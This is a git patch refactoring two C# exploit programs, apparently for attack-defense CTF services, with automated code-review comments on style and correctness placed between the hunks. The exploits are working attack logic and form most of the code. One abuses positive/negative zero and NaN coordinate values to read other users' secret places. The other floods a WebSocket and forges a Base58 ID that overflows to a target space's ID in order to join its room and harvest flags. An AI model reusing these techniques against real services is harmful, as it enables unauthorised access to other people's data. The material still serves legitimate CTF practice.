From dff4d7af44659cc319f488bea8cb60d4432bed81 Mon Sep 17 00:00:00 2001
From: Dmitriy Titarenko
Date: Fri, 25 Aug 2023 10:07:43 +0500
Subject: [PATCH] sploits small fixes
---
 sploits/places/Program.cs | 38 ++++++++--------------------
 sploits/spaces/Program.cs | 51 ++++++++++++++++-----------------------
 2 files changed, 31 insertions(+), 58 deletions(-)
diff --git a/sploits/places/Program.cs b/sploits/places/Program.cs
index dd26a79b5..7d1ed2f70 100644
--- a/sploits/places/Program.cs
+++ b/sploits/places/Program.cs
@@ -16,6 +16,7 @@
 HttpClient cookieClient;
 CookieContainer cookies;
+// Using state for NaN places and other stuff, so no need to brute force values each round
 await using var stateStream = new FileStream("state.json", FileMode.OpenOrCreate, FileAccess.ReadWrite, FileShare.Read);
 if(stateStream.Length > 0)
 state = (await JsonSerializer.DeserializeAsync(stateStream, jsonOptions))!;
@@ -50,11 +51,11 @@
 cookieClient = new HttpClient(new HttpClientHandler { UseCookies = true, CookieContainer = cookies }) { BaseAddress = baseUri };
 // Add positive zero point
- var p1PositiveZero = await PutAndReadStringAsync(cookieClient, new Place {Lat = 0.1337, Long = 0.0, Public = "pwn", Secret = "pwn"});
+ var p1PositiveZero = await PutAndReadStringAsync(cookieClient, new Place(0.1337, 0.0, "pwn", "pwn"));
 await ColoredWriteLineAsync(Console.Error, " Positive zero [1]: " + p1PositiveZero, ConsoleColor.White);
 // Add negative zero point with the same other coord
- var p2NegativeZero = await PutAndReadStringAsync(cookieClient, new Place {Lat = 0.1337, Long = -0.0, Public = "pwn", Secret = "pwn"});
+ var p2NegativeZero = await PutAndReadStringAsync(cookieClient, new Place(0.1337, -0.0, "pwn", "pwn"));
 await ColoredWriteLineAsync(Console.Error, " Negative zero [2]: " + p2NegativeZero, ConsoleColor.White);
 cookies = new CookieContainer();
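Review bot: The positional `new Place(0.1337, 0.0, "pwn", "pwn")` and `new Place(0.1337, -0.0, "pwn", "pwn")` calls drop the property names the old object initializers carried, and because `Lat` and `Long` are both `double`, a swapped pair compiles and runs silently; the same applies to the `Place`, `PlaceInfoOnly` and `State` constructions in the next hunk. Named arguments keep the intent readable and still bind correctly if the record's parameter order ever changes, e.g. `new Place(Lat: 0.1337, Long: 0.0, Public: "pwn", Secret: "pwn")`. The enclosing block starts and ends outside the hunk.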
@@ -64,21 +65,21 @@
 await ColoredWriteLineAsync(Console.Error, "Brute force NaN points...");
 // Add some random point to start brute force from
- var point = await PutAndReadStringAsync(cookieClient, new Place {Lat = 0.1337, Long = 0.1337, Public = "pwn", Secret = "pwn"});
+ var point = await PutAndReadStringAsync(cookieClient, new Place(0.1337, 0.1337, "pwn", "pwn"));
 var (p5NanPoint, p4SomeOwnedPoint) = await BruteForceNanValueAsync(cookieClient, point);
 // Update non-existent random owned point in order to save it to the database
- p4SomeOwnedPoint = await PutAndReadStringAsync(cookieClient, new PlaceInfoOnly { Public = "pwn", Secret = "pwn" }, p4SomeOwnedPoint);
+ p4SomeOwnedPoint = await PutAndReadStringAsync(cookieClient, new PlaceInfoOnly("pwn", "pwn"), p4SomeOwnedPoint);
 await ColoredWriteLineAsync(Console.Error, " Random point [4]: " + p4SomeOwnedPoint, ConsoleColor.White);
 // Update non-existent NaN point in order to save it to the database
- p5NanPoint = await PutAndReadStringAsync(cookieClient, new PlaceInfoOnly { Public = "pwn", Secret = "pwn" }, p5NanPoint);
+ p5NanPoint = await PutAndReadStringAsync(cookieClient, new PlaceInfoOnly("pwn", "pwn"), p5NanPoint);
 await ColoredWriteLineAsync(Console.Error, " NaN point [5]: " + p5NanPoint, ConsoleColor.White);
 var p6NanPoint = p5NanPoint;
 await ColoredWriteLineAsync(Console.Error, "Same NaN point [6]: " + p6NanPoint, ConsoleColor.White);
- state = new State { Cookie = max.Value, PositiveZero = p1PositiveZero, NegativeZero = p2NegativeZero, RndBeforeNan = p4SomeOwnedPoint, Nan = p5NanPoint };
+ state = new State(max.Value, p1PositiveZero, p2NegativeZero, p4SomeOwnedPoint, p5NanPoint);
 await JsonSerializer.SerializeAsync(stateStream, state, jsonOptions);
 }
@@ -154,25 +155,6 @@ async Task ColoredWriteLineAsync(TextWriter writer, string line, ConsoleColor co
 Console.ResetColor();
 }
-class State
-{
- public string Cookie { get; set; }
- public string PositiveZero { get; set; }
- public string NegativeZero { get; set; }
- public string RndBeforeNan { get; set; }
- public string Nan { get; set; }
-}
-
-class Place
-{
- public double Lat { get; set; }
- public double Long { get; set; }
- public string? Public { get; set; }
- public string? Secret { get; set; }
-}
-
-class PlaceInfoOnly
-{
- public string? Public { get; set; }
- public string? Secret { get; set; }
-}
+record State(string Cookie, string PositiveZero, string NegativeZero, string RndBeforeNan, string Nan);
+record Place(double Lat, double Long, string? Public, string? Secret);
+record PlaceInfoOnly(string? Public, string? Secret);
diff --git a/sploits/spaces/Program.cs b/sploits/spaces/Program.cs
index 27aa29ed6..bb4acadb9 100644
--- a/sploits/spaces/Program.cs
+++ b/sploits/spaces/Program.cs
@@ -18,13 +18,14 @@
 var cts = new CancellationTokenSource();
+var hostAndPort = args[0];
 bool useSavedState = false;
 var cookies = new CookieContainer();
 await using var stateStream = new FileStream("cookie.txt", FileMode.OpenOrCreate, FileAccess.ReadWrite, FileShare.Read);
 if(stateStream.Length > 0)
 {
 using var reader = new StreamReader(stateStream);
- cookies.Add(new Cookie("usr", await reader.ReadToEndAsync(), null, args[0]));
+ cookies.Add(new Cookie("usr", await reader.ReadToEndAsync(), null, hostAndPort.Split(':')[0]));
 useSavedState = true;
 }
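Review bot: `record State(string Cookie, string PositiveZero, string NegativeZero, string RndBeforeNan, string Nan);` declares every member non-nullable, yet from what the diff shows a `State` is also produced by `JsonSerializer.DeserializeAsync` from state.json in the first hunk of this file, where a missing or null property is bound as `null` into those parameters without any diagnostic; the old class had the same gap, but the positional record now reads like a guarantee. A short check after the load would make a stale or hand-edited state.json fail at startup rather than later as a NullReferenceException, e.g. `if (state.Nan is null || state.PositiveZero is null) throw new InvalidOperationException("state.json is incomplete");` — or declare the parameters `string?` if partial state is expected. Worth confirming whether the `jsonOptions` used there already rejects nulls.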
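Review bot: `var hostAndPort = args[0];` (and `args[1]` in the @@ -94 hunk further down) is read without checking `args.Length`, so a run with missing arguments fails with an IndexOutOfRangeException instead of a usage line; a guard near the top such as `if (args.Length < 2) { await Console.Error.WriteLineAsync("usage: <host[:port]> <context>"); return 1; }` would make that explicit. The new `hostAndPort.Split(':')[0]` used as the cookie domain also assumes a host name or IPv4 literal: a bracketed IPv6 form like `[::1]:8080` would yield `[`, so if that form is ever needed, taking `Uri.DnsSafeHost` from the `Uri` already built for the WebSocket connect later in the file would be more robust. The surrounding top-level statements continue past both ends of the hunk.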
@@ -49,10 +50,10 @@
 });
 var ws1 = new ClientWebSocket();
-await ws1.ConnectAsync(new Uri($"ws://{args[0]}/ws"), hc, CancellationToken.None);
+await ws1.ConnectAsync(new Uri($"ws://{hostAndPort}/ws"), hc, CancellationToken.None);
 var cookie = cookies.GetAllCookies().FirstOrDefault(c => c.Name == "usr")?.Value;
-Console.WriteLine("Cookie: " + cookie);
+await Console.Error.WriteLineAsync("Cookie: " + cookie);
 var flagRegex = new Regex(@"^TEAM\d{1,3}_[A-Z0-9]{32}$", RegexOptions.Compiled | RegexOptions.CultureInvariant);
@@ -64,10 +65,10 @@
 await Task.Delay(1000);
 try
 {
- var msg = JsonSerializer.SerializeToUtf8Bytes(new Command { Type = MsgType.Generate }, jsonOptions);
+ var msg = JsonSerializer.SerializeToUtf8Bytes(new Command(MsgType.Generate, null), jsonOptions);
 for(int k = 0; k < 10; k++)
 {
- for(int i = 0; i <= 595; i++)
+ for(int i = 0; i <= 595; i++) // Use the number of iterations close to limit per minute
 {
 await ws1.SendAsync(msg, WebSocketMessageType.Text, true, cts.Token);
 if(i % 100 == 0) await Console.Error.WriteLineAsync($"send {i} msgs");
@@ -85,7 +86,7 @@
 }
 await Task.Delay(1000);
-await ws1.SendAsync(JsonSerializer.SerializeToUtf8Bytes(new Command { Type = MsgType.Join }, jsonOptions), WebSocketMessageType.Text, true, CancellationToken.None);
+await ws1.SendAsync(JsonSerializer.SerializeToUtf8Bytes(new Command(MsgType.Join, null), jsonOptions), WebSocketMessageType.Text, true, CancellationToken.None);
 await using var writer = new StreamWriter(stateStream);
 writer.Write(cookie);
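Review bot: The send inside the loop in the @@ -64 hunk passes `cts.Token` to `ws1.SendAsync`, while the rewritten `ConnectAsync` in the @@ -49 hunk and the Join send in the @@ -85 hunk pass `CancellationToken.None`, so if `cts` is ever cancelled it stops only the loop and not the sends around it. Passing `cts.Token` in all three places keeps the cancellation behaviour uniform, e.g. `await ws1.SendAsync(JsonSerializer.SerializeToUtf8Bytes(new Command(MsgType.Join, null), jsonOptions), WebSocketMessageType.Text, true, cts.Token);`. Whether `cts` is cancelled anywhere is not visible in this diff, so this may be purely a consistency point. The `try` block opened in the @@ -64 hunk closes outside it.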
@@ -94,34 +95,37 @@
 await Task.Delay(1000);
 var context = args[1];
-var pwn = FindOverflowedEqualValue(context.Split('/')[0]);
-await Console.Error.WriteLineAsync(pwn);
+var spaceIdToPwn = context.Split('/')[0];
+var pwn = FindOverflowedEqualValue(spaceIdToPwn);
+await Console.Error.WriteLineAsync("" + pwn);
-await ws1.SendAsync(JsonSerializer.SerializeToUtf8Bytes(new Command {Type = MsgType.Room, Data = pwn}, jsonOptions), WebSocketMessageType.Text, true, CancellationToken.None);
+await ws1.SendAsync(JsonSerializer.SerializeToUtf8Bytes(new Command(MsgType.Room, pwn), jsonOptions), WebSocketMessageType.Text, true, CancellationToken.None);
 await Task.Delay(1000);
 await Console.Error.WriteLineAsync("===== SECOND WS CONNECTION =====");
 var ws2 = new ClientWebSocket();
-await ws2.ConnectAsync(new Uri($"ws://{args[0]}/ws"), CancellationToken.None);
+await ws2.ConnectAsync(new Uri($"ws://{hostAndPort}/ws"), CancellationToken.None);
 CreateRecvThread(ws2).Start();
-await ws2.SendAsync(JsonSerializer.SerializeToUtf8Bytes(new Command {Type = MsgType.Join, Data = pwn}, jsonOptions), WebSocketMessageType.Text, true, CancellationToken.None);
+await ws2.SendAsync(JsonSerializer.SerializeToUtf8Bytes(new Command(MsgType.Join, pwn), jsonOptions), WebSocketMessageType.Text, true, CancellationToken.None);
 if(context.Contains('/'))
 {
 await Task.Delay(1000);
- await ws2.SendAsync(JsonSerializer.SerializeToUtf8Bytes(new Command { Type = MsgType.Room, Data = context.Split('/').Last() }, jsonOptions), WebSocketMessageType.Text, true, CancellationToken.None);
+ var room = context.Split('/').Last();
+ await ws2.SendAsync(JsonSerializer.SerializeToUtf8Bytes(new Command(MsgType.Room, room), jsonOptions), WebSocketMessageType.Text, true, CancellationToken.None);
 }
 await Task.Delay(3000);
-string FindOverflowedEqualValue(string example)
+string FindOverflowedEqualValue(string spaceIdToPwn)
 {
- if(!Base58.TryDecodeUInt64(example, out var value))
+ if(!Base58.TryDecodeUInt64(spaceIdToPwn, out var value))
 throw new Exception("Invalid input");
 var x = new BigInteger(value);
+ // Start finding Base58 string which decodes to the same Int64 from some random point greater than long.MaxValue
 Base58.TryDecodeBigInt("33333333333333333", out var from);
 for(int i = 0; i < 10005000; i++)
 {
@@ -130,7 +134,6 @@ string FindOverflowedEqualValue(string example)
 if(!result.All(char.IsAsciiLetterLower))
 continue;
-Console.WriteLine(i + " " + result);
 if(!Base58.TryDecodeUInt64(result, out var check) || check != value)
 throw new Exception("Auto check failed");
@@ -140,6 +143,7 @@ string FindOverflowedEqualValue(string example)
 throw new Exception("Attempts limit exceeded");
 }
+// Processing received messages
 Thread CreateRecvThread(WebSocket ws) => new(async () =>
 {
 var buffer = new byte[4096];
@@ -181,21 +185,8 @@ string FindOverflowedEqualValue(string example)
 }
 });
-public class Command
-{
- public MsgType Type { get; set; }
- public string Data { get; set; }
-}
-
-internal class Message
-{
- public MsgType Type { get; set; }
- public string? Context { get; set; }
- public string? Author { get; set; }
- public string? Avatar { get; set; }
- public string? Text { get; set; }
- public DateTime Time { get; set; }
-}
+record Command(MsgType Type, string? Data);
+record Message(MsgType Type, string? Context, string? Author, string? Avatar, string? Text, DateTime Time);
 public enum MsgType
 {
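Review bot: The renamed parameter in `string FindOverflowedEqualValue(string spaceIdToPwn)` now shadows the top-level local `var spaceIdToPwn = context.Split('/')[0];` introduced in the same hunk; C# permits this inside a local function, but every use then needs a second look to see which one is meant, so a distinct name (keeping `example`, or `input`) removes the ambiguity. `await Console.Error.WriteLineAsync("" + pwn);` concatenates an empty string onto a value that is already a `string`; the earlier `WriteLineAsync(pwn)` form is equivalent, and a label such as `"Overflowed value: " + pwn` would make the stderr line self-describing. The added comment speaks of the same `Int64` and `long.MaxValue` while the code goes through `TryDecodeUInt64`; it is worth confirming which width the comment intends. The body of FindOverflowedEqualValue continues past the end of the hunk.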
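Review bot: The new `// Processing received messages` above `Thread CreateRecvThread(WebSocket ws) => new(async () =>` leaves out the one thing a reader needs to know: the async lambda is converted to the void-returning `ThreadStart` delegate, so it runs as async void — the thread ends at the first `await`, the rest continues on the thread pool, and an exception thrown after that point is unobserved. A comment that says so, e.g. `// Receive loop. The lambda runs as async void: the Thread only covers the synchronous prefix and exceptions after the first await are unobserved`, or returning a `Task` from `Task.Run` that the caller can await, would make the behaviour explicit. The lambda body lies outside the hunk, so I cannot see what it awaits.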
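Review bot: `record Command(MsgType Type, string? Data);` drops the `public` that `public class Command` carried, so the type is now `internal` like `Message`, while `public enum MsgType` just below stays public; if the narrowing is intended it reads better spelled out as `internal record Command(MsgType Type, string? Data);`, and if not, `public` should be restored. Nothing in this diff references `Command` from another project, so the change is probably harmless, but an explicit modifier removes the question.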